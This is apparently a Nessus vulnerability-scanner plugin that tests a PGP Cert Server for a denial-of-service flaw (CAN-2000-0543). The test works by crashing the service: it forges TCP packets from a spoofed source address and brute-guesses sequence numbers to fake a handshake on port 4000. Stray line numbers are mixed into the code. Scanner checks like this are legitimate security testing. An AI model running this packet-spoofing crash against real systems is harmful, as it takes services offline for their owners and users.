
#
# This script was written by John Lampe (j_lampe@bellsouth.net)
#
# Changes by rd : description
#
# See the Nessus Scripts License for details
#
# Registration pass: when the scanner loads the plugin with `description`
# set, only the metadata below is recorded and the script exits before
# any traffic is generated.
if(description)
{
  script_id(10442);
  script_bugtraq_id(1343);
 script_version ("$Revision: 1.12 $");
  script_cve_id("CAN-2000-0543");
  script_name(english:"NAI PGP Cert Server DoS");
  script_description(english:"
It was possible to make the remote PGP Cert Server
crash by spoofing a TCP connection that seems to
come from an unresolvable IP address.
 
An attacker may use this flaw to prevent your PGP 
certificate server from working properly.
 
Solution: Upgrade to the latest version.
 
Risk factor : High");
  script_summary(english:"Check for DoS in PGP Cert Server");
  # ACT_DENIAL: the check tries to crash the service to confirm the flaw,
  # so the scanner only schedules it when disruptive (non-safe) checks are
  # permitted.
  script_category(ACT_DENIAL);
  # NOTE(review): the French family name appears mis-encoded in this copy
  # (looks like a cp437 rendering of "Déni"); the literal is left as-is.
  script_family(english:"Denial of Service", francais:"DΘni de service");
  script_copyright(english:"By John Lampe....j_lampe@bellsouth.net");
  # The cert server listens on 4000; skip the host entirely otherwise.
  script_require_ports(4000);
  exit(0);
}
  33.  
  34.  
  35.  
  36. #
  37. # The script code starts here
  38.  
  39.  
  40. if(!get_port_state(4000))exit(0);
  41.  
  42. soc = open_sock_tcp(4000);
  43. if(!soc)exit(0);
  44. close(soc);
  45.  
  46.  
  47. #get a sequence number from the target
  48.  
  49.  
  50. dstaddr=get_host_ip();
  51. srcaddr=this_host();
  52. IPH = 20;
  53. IP_LEN = IPH;
  54.  
  55. ip = forge_ip_packet(   ip_v : 4,
  56.                         ip_hl : 5,
  57.                         ip_tos : 0,
  58.                         ip_len : IP_LEN,
  59.                         ip_id : 0xABA,
  60.                         ip_p : IPPROTO_TCP,
  61.                         ip_ttl : 255,
  62.                         ip_off : 0,
  63.                         ip_src : srcaddr);
  64.  
  65. port = get_host_open_port();
  66. if(!port)port = 139;
  67.  
  68. tcpip = forge_tcp_packet(    ip       : ip,
  69.                              th_sport : port,
  70.                              th_dport : port,
  71.                              th_flags : TH_SYN,
  72.                              th_seq   : 0xF1C,
  73.                              th_ack   : 0,
  74.                              th_x2    : 0,
  75.                              th_off   : 5,
  76.                              th_win   : 512,
  77.                              th_urp   : 0);
  78.  
  79. filter = string("tcp and (src addr ", dstaddr, " and dst addr ", srcaddr, " dst port ", port, ")");
  80. result = send_packet(tcpip, pcap_active:TRUE, pcap_filter:filter);
  81. if (result)  {
  82.   tcp_seq = get_tcp_element(tcp:result, element:"th_seq");
  83. }
  84.  
  85.  
  86.  
  87.  
  88. #now spoof Funky IP with guessed sequence numbers
  89.  
  90.  
  91. #packet 1.....SPOOF SYN
  92. IPH = 20;
  93. IP_LEN = IPH;
  94. newsrcaddr = 10.187.76.12;
  95. port = 4000;
  96.  
  97. ip2 = forge_ip_packet(   ip_v : 4,
  98.                         ip_hl : 5,
  99.                         ip_tos : 0,
  100.                         ip_len : IP_LEN,
  101.                         ip_id : 0xABA,
  102.                         ip_p : IPPROTO_TCP,
  103.                         ip_ttl : 255,
  104.                         ip_off : 0,
  105.                         ip_src : newsrcaddr);
  106.  
  107.  
  108. tcpip = forge_tcp_packet(    ip       : ip2,
  109.                              th_sport : 5555,
  110.                              th_dport : port,
  111.                              th_flags : TH_SYN,
  112.                              th_seq   : 0xF1C,
  113.                              th_ack   : 0,
  114.                              th_x2    : 0,
  115.                              th_off   : 5,
  116.                              th_win   : 512,
  117.                              th_urp   : 0);
  118.  
  119. result = send_packet(tcpip,pcap_active:FALSE);
  120.  
  121.  
  122. # SPOOF SYN/ACK (brute guess next sequence number)
  123.  
  124.  
  125. for (j=tcp_seq+1; j < tcp_seq + 25; j=j+1) {
  126.   tcpip = forge_tcp_packet(    ip       : ip2,
  127.                                th_sport : 5555,
  128.                                th_dport : port,
  129.                                th_flags : TH_ACK,
  130.                                th_seq   : 0xF1D,
  131.                                th_ack   : j,
  132.                                th_x2    : 0,
  133.                                th_off   : 5,
  134.                                th_win   : 512,
  135.                                th_urp   : 0);
  136.  
  137.  
  138.   send_packet(tcpip,pcap_active:FALSE);
  139. }
  140.  
  141. sleep(15);
  142. soc = open_sock_tcp(4000);
  143. if(!soc)
  144. {
  145.  security_hole(4000);
  146. }
  147.